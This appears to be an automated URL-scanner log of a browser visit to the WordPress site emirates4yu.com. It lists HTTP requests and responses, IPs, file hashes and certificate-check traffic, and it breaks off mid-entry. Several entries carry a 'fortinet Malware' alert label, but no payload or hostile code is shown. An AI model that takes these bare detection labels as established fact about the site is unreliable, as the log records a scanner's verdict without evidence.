www.emirates4yu.com/
35.190.203.220 301 Moved Permanently 162 B IP 35.190.203.220:0
File type HTML document text\012- HTML document text\012- HTML document, ASCII text, with CRLF line terminators
Hash 4f8e702cc244ec5d4de32740c0ecbd97
3adb1f02d5b6054de0046e367c1d687b6cdf7aff
9e17cb15dd75bbbd5dbb984eda674863c3b10ab72613cf8a39a00c3e11a8492a
Analyzer Verdict Alert fortinet Malware
GET / HTTP/1.1
Host: www.emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Fri, 25 Nov 2022 12:01:59 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Keep-Alive: timeout=20
Location: http://emirates4yu.com/
r3.o.lencr.org/
23.36.77.32 200 OK 503 B IP 23.36.77.32:0
ASN #20940 Akamai International B.V.
Hash 7c60904d097cde276e4e5632cef1b9f1
4f805026462589345d85e8df2d18eafba6237504
12af026999398f4976749e320667d43da3f99b7a2e8254aca7a410a964a106aa
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "12AF026999398F4976749E320667D43DA3F99B7A2E8254ACA7A410A964A106AA"
Last-Modified: Thu, 24 Nov 2022 06:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=4514
Expires: Fri, 25 Nov 2022 13:17:13 GMT
Date: Fri, 25 Nov 2022 12:01:59 GMT
Connection: keep-alive
ocsp.digicert.com/
93.184.220.29 200 OK 471 B IP 93.184.220.29:0
Hash af40a2fcf8debb90c3608002da6c907a
3c75d6c0b557a3bd8d5db50155b8d896e852c145
555617a51ee3077552545a29a3baf0b43e8a82367e4c08110ee480ebedc8b523
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 4942
Cache-Control: max-age=85894
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:01:59 GMT
Etag: "637f47ef-1d7"
Expires: Sat, 26 Nov 2022 11:53:33 GMT
Last-Modified: Thu, 24 Nov 2022 10:31:11 GMT
Server: ECS (ska/F70F)
X-Cache: HIT
Content-Length: 471
firefox.settings.services.mozilla.com/v1/
34.102.187.140 200 OK 939 B URL HTTP/2 firefox.settings.services.mozilla.com/v1/
IP 34.102.187.140:0
File type JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Hash 567df7db606cf5d0871aa5bc9311b6da
4263faac7cbab2fcaf6661911dcad5091c06be17
e9650e1fdc46fc8678708ddcc37ab369c7a6d50489a004be896f20c7a3a644b0
GET /v1/ HTTP/1.1
Host: firefox.settings.services.mozilla.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
access-control-allow-origin: *
access-control-expose-headers: Content-Type, Retry-After, Content-Length, Alert, Backoff
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 939
via: 1.1 google
date: Fri, 25 Nov 2022 11:19:06 GMT
cache-control: public,max-age=3600
content-type: application/json
age: 2573
alt-svc: clear
X-Firefox-Spdy: h2
r3.o.lencr.org/
23.36.77.32 200 OK 503 B IP 23.36.77.32:0
ASN #20940 Akamai International B.V.
Hash 260e9998c20d831b66f1029c8f47aac9
716d630f647c54dc69a7f9c63a6cac294b3df7f7
c9951a909f354174f0075a01c01c3c3aa6960983040e328bfbbbea81aeb405c2
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "C9951A909F354174F0075A01C01C3C3AA6960983040E328BFBBBEA81AEB405C2"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=12785
Expires: Fri, 25 Nov 2022 15:35:04 GMT
Date: Fri, 25 Nov 2022 12:01:59 GMT
Connection: keep-alive
content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2022-12-30-09-21-26.chain
34.160.144.191 200 OK 5.3 kB URL HTTP/2 content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2022-12-30-09-21-26.chain
IP 34.160.144.191:0
File type PEM certificate\012- , ASCII text
Hash 9ebddc2b260d081ebbefee47c037cb28
492bad62a7ca6a74738921ef5ae6f0be5edebf39
74bbb7cba16f7d084a08a0907d47d7496e5c148f904707ec6950f8f6a61027e5
GET /chains/remote-settings.content-signature.mozilla.org-2022-12-30-09-21-26.chain HTTP/1.1
Host: content-signature-2.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
x-amz-id-2: larp3dxMV6MzEiRKlZ4eHNw3BHMI44a+svBhZJPogZgP1atigAHq6/Cxr/CFyRKdkRLbA92b5iY=
x-amz-request-id: 36XJTH7YFCFD5TYP
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
content-length: 5348
via: 1.1 google
date: Fri, 25 Nov 2022 11:43:49 GMT
age: 1090
last-modified: Thu, 10 Nov 2022 09:21:27 GMT
etag: "9ebddc2b260d081ebbefee47c037cb28"
content-type: binary/octet-stream
cache-control: public,max-age=3600
alt-svc: clear
X-Firefox-Spdy: h2
emirates4yu.com/
35.190.203.220 301 Moved Permanently 162 B IP 35.190.203.220:0
File type HTML document text\012- HTML document text\012- HTML document, ASCII text, with CRLF line terminators
Hash 4f8e702cc244ec5d4de32740c0ecbd97
3adb1f02d5b6054de0046e367c1d687b6cdf7aff
9e17cb15dd75bbbd5dbb984eda674863c3b10ab72613cf8a39a00c3e11a8492a
Analyzer Verdict Alert fortinet Malware
GET / HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Fri, 25 Nov 2022 12:01:59 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Keep-Alive: timeout=20
Location: https://emirates4yu.com/
contile.services.mozilla.com/v1/tiles
34.117.237.239 200 OK 12 B URL HTTP/2 contile.services.mozilla.com/v1/tiles
IP 34.117.237.239:0
File type JSON data\012- , ASCII text, with no line terminators
Hash 23e88fb7b99543fb33315b29b1fad9d6
a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
GET /v1/tiles HTTP/1.1
Host: contile.services.mozilla.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:01:59 GMT
content-type: application/json
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2
emirates4yu.com/
35.190.203.220 302 Found 0 B IP 35.190.203.220:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
Analyzer Verdict Alert fortinet Malware
GET / HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
HTTP/2 302 Found
server: nginx
date: Fri, 25 Nov 2022 12:01:59 GMT
content-type: text/html; charset=UTF-8
content-length: 0
location: https://emirates4yu.com/fr/
x-redirect-by: Polylang
x-powered-by: WP Engine
x-cacheable: non200
cache-control: max-age=600, must-revalidate
x-cache: HIT: 3
x-cache-group: normal
X-Firefox-Spdy: h2
ocsp.digicert.com/
93.184.220.29 200 OK 280 B IP 93.184.220.29:0
Hash a8975f19de3c977c08e72e5f476b0987
71cc460e3bf3cbfe0c92424f049e59488ad3bc7a
a4342ea09f474dbdd8c0d11264d92082bde2fc0fbbc3e0169ac39113cbd6700a
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 6593
Cache-Control: max-age=107001
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:02:00 GMT
Etag: "637f93f0-118"
Expires: Sat, 26 Nov 2022 17:45:21 GMT
Last-Modified: Thu, 24 Nov 2022 15:55:28 GMT
Server: ECS (ska/F70F)
X-Cache: HIT
Content-Length: 280
emirates4yu.com/wp-content/uploads/bb-plugin/cache/1-1-circle.png
35.190.203.220 200 OK 674 B URL HTTP/2 emirates4yu.com/wp-content/uploads/bb-plugin/cache/1-1-circle.png
IP 35.190.203.220:0
File type PNG image data, 90 x 90, 4-bit colormap, non-interlaced\012- data
Hash 0cd3dc69618beaeeac3422cc20824ff5
6e6d21be94f4819e9df4e6933651e0317f507cfe
f658cf1ce5db5b6795a01fdde63e23c7e9c688b3a4f89e11e5b92a479b7d6c73
GET /wp-content/uploads/bb-plugin/cache/1-1-circle.png HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/png
content-length: 674
last-modified: Wed, 19 Dec 2018 10:51:42 GMT
etag: "5c1a22be-2a2"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/bb-plugin/cache/2-circle.png
35.190.203.220 200 OK 715 B URL HTTP/2 emirates4yu.com/wp-content/uploads/bb-plugin/cache/2-circle.png
IP 35.190.203.220:0
File type PNG image data, 90 x 90, 4-bit colormap, non-interlaced\012- data
Hash 8c493838b5bbc86007794df2a4b4a619
32c6d3bb75bb4c0ccee5377097ad86a65cd287b9
75a19641e8ccee31f8ffc1bd5a431a91393d1b0675d19faaad35f68d6ea5e7d1
GET /wp-content/uploads/bb-plugin/cache/2-circle.png HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/png
content-length: 715
last-modified: Wed, 19 Dec 2018 10:53:27 GMT
etag: "5c1a2327-2cb"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/bb-plugin/cache/3-circle.png
35.190.203.220 200 OK 706 B URL HTTP/2 emirates4yu.com/wp-content/uploads/bb-plugin/cache/3-circle.png
IP 35.190.203.220:0
File type PNG image data, 90 x 90, 4-bit colormap, non-interlaced\012- data
Hash ba9672b94bb15f9c1f8e1c28e9798f9e
9543f40a463a9891f46718effcb188ed92d7d7f0
76900c71358e3fc83a7c4961ef39ad157b859aa7333c99305fab7d31deecfe74
GET /wp-content/uploads/bb-plugin/cache/3-circle.png HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/png
content-length: 706
last-modified: Wed, 19 Dec 2018 10:53:47 GMT
etag: "5c1a233b-2c2"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/bb-plugin/cache/4-circle.png
35.190.203.220 200 OK 727 B URL HTTP/2 emirates4yu.com/wp-content/uploads/bb-plugin/cache/4-circle.png
IP 35.190.203.220:0
File type PNG image data, 90 x 90, 4-bit colormap, non-interlaced\012- data
Hash 7fc3c2bdcd10d6aa163d7af30b91316a
c60e7769afa176c9a9911ae48f441c8f8c6edf9f
21a3cd5d864cd9120f3e31b899505235d407d91153c538233ebe3c0b7f7fd35e
GET /wp-content/uploads/bb-plugin/cache/4-circle.png HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/png
content-length: 727
last-modified: Wed, 19 Dec 2018 10:53:58 GMT
etag: "5c1a2346-2d7"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 472 B IP 142.250.74.3:0
Hash b44543de9922ec7d97f2e0be1865553e
caef856450efd75de0cfae9402903b1f4bd6de4c
d251377b4bc11c32a847ce4dc5dfda92e56031617f5b3eeea54fdcd0945b3eb7
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:02:00 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
emirates4yu.com/wp-content/plugins/jetpack/css/jetpack.css?ver=9.0.3
35.190.203.220 200 OK 15 kB URL HTTP/2 emirates4yu.com/wp-content/plugins/jetpack/css/jetpack.css?ver=9.0.3
IP 35.190.203.220:0
File type ASCII text, with very long lines (20619)
Hash f03ae17cede9c16960e7046955b914ea
0c611bf539d15b368c1225635508990f5a74804b
37127df2343e14dbb7e622e6c9482834f87324a46669f97e1975834fe3adabd1
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/jetpack/css/jetpack.css?ver=9.0.3 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: text/css
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Thu, 03 Jun 2021 12:08:13 GMT
etag: W/"60b8c62d-12cc3"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2018/12/banner-gold-light.png
35.190.203.220 200 OK 30 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2018/12/banner-gold-light.png
IP 35.190.203.220:0
File type PNG image data, 400 x 84, 8-bit/color RGBA, non-interlaced\012- data
Hash caa8ee67081ed07e562b6e5b22380425
145cac53a736fd95e074c9cfa87597a480f83fb1
2a3da1296e1f7781983fec34a54669aaa19313fc439080b918aa0a2d40d964d2
GET /wp-content/uploads/2018/12/banner-gold-light.png HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/png
content-length: 30506
last-modified: Tue, 25 Dec 2018 18:21:40 GMT
etag: "5c227534-772a"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2018/12/white-logo.png
35.190.203.220 200 OK 11 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2018/12/white-logo.png
IP 35.190.203.220:0
File type PNG image data, 400 x 86, 8-bit/color RGBA, non-interlaced\012- data
Hash 11c65505119bfe664f3a7d0087bf9e36
846cb888e06f0a8a11111c1abb89f408032d608d
1d65505cafcf66621bdcca0bc57c63a1a84e0abc9079bc771bdbc4b5c74337ee
GET /wp-content/uploads/2018/12/white-logo.png HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/png
content-length: 11248
last-modified: Sun, 23 Dec 2018 23:01:17 GMT
etag: "5c2013bd-2bf0"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/bb-plugin/cache/5-circle.png
35.190.203.220 200 OK 692 B URL HTTP/2 emirates4yu.com/wp-content/uploads/bb-plugin/cache/5-circle.png
IP 35.190.203.220:0
File type PNG image data, 90 x 90, 4-bit colormap, non-interlaced\012- data
Hash b895bad7c6e89b3434b1a9409ee6c58f
04d3ee358a33b368f11bf6ef4ec482c5d55f1340
c862ecc59488c9e62e134c457cfb62d6193d3385884f15245a1e52c0ea91b98c
GET /wp-content/uploads/bb-plugin/cache/5-circle.png HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/png
content-length: 692
last-modified: Wed, 19 Dec 2018 10:54:21 GMT
etag: "5c1a235d-2b4"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/top-logo-6.jpg
35.190.203.220 200 OK 12 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/top-logo-6.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3\012- data
Hash aaa74c4b42cea787e5794031d83a315e
af52e3a094148964cf01f2cac7a10c4e2f6a8805
def10b8a630c6dc45cd66abcf423389e99cbae05c05e95d01bd78258501146fd
GET /wp-content/uploads/2017/11/top-logo-6.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 12348
last-modified: Tue, 21 Nov 2017 10:37:03 GMT
etag: "5a1401cf-303c"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/bb-plugin/cache/why2-portrait.jpg
35.190.203.220 200 OK 25 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/bb-plugin/cache/why2-portrait.jpg
IP 35.190.203.220:0
File type JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82", baseline, precision 8, 378x540, components 3\012- data
Hash a23a95b5e39a9e24cbdbbc226975fdc9
d25340850db44e776d8b9dcb67ba25a92caa7516
3ab332270a5f1126fe473a3a04566907a45160bb95db3a817fc9b9c5881375e1
GET /wp-content/uploads/bb-plugin/cache/why2-portrait.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 25151
last-modified: Mon, 07 Nov 2022 16:42:38 GMT
etag: "6369357e-623f"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/top-logo-5.jpg
35.190.203.220 200 OK 11 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/top-logo-5.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3\012- data
Hash 6bb7e6d9c89a0e4ed3ebac4571087a36
5837fd83b1f9aa38f21196f04d65492dc4d9c69c
42fd34a6a439989a8f0ce40266b44bd344498f8ab3a3a254d6c0e772e50afef2
GET /wp-content/uploads/2017/11/top-logo-5.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 10577
last-modified: Tue, 21 Nov 2017 10:37:00 GMT
etag: "5a1401cc-2951"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/top-logo-4.jpg
35.190.203.220 200 OK 4.5 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/top-logo-4.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3\012- data
Hash 7da494776a625a64414e3d8ce4ff2380
e267f27db187c1207751ca267f2ce49825176f64
33f55957a37c6b1f6b8e47610e835681013a11dcd07736bbd992782df142965a
GET /wp-content/uploads/2017/11/top-logo-4.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 4502
last-modified: Tue, 21 Nov 2017 10:36:58 GMT
etag: "5a1401ca-1196"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/top-logo-3.jpg
35.190.203.220 200 OK 10 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/top-logo-3.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3\012- data
Hash cec408ad1ab6fab8b5181e86b72da903
ff2ec730380e476f7b9138269cf2906701d32126
a6ceb33967270e90efcbb0e63382e6c8fccda48565f81fc8b109adfc63c45a21
GET /wp-content/uploads/2017/11/top-logo-3.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 9958
last-modified: Tue, 21 Nov 2017 10:36:56 GMT
etag: "5a1401c8-26e6"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/bottom-12.jpg
35.190.203.220 200 OK 8.6 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/bottom-12.jpg
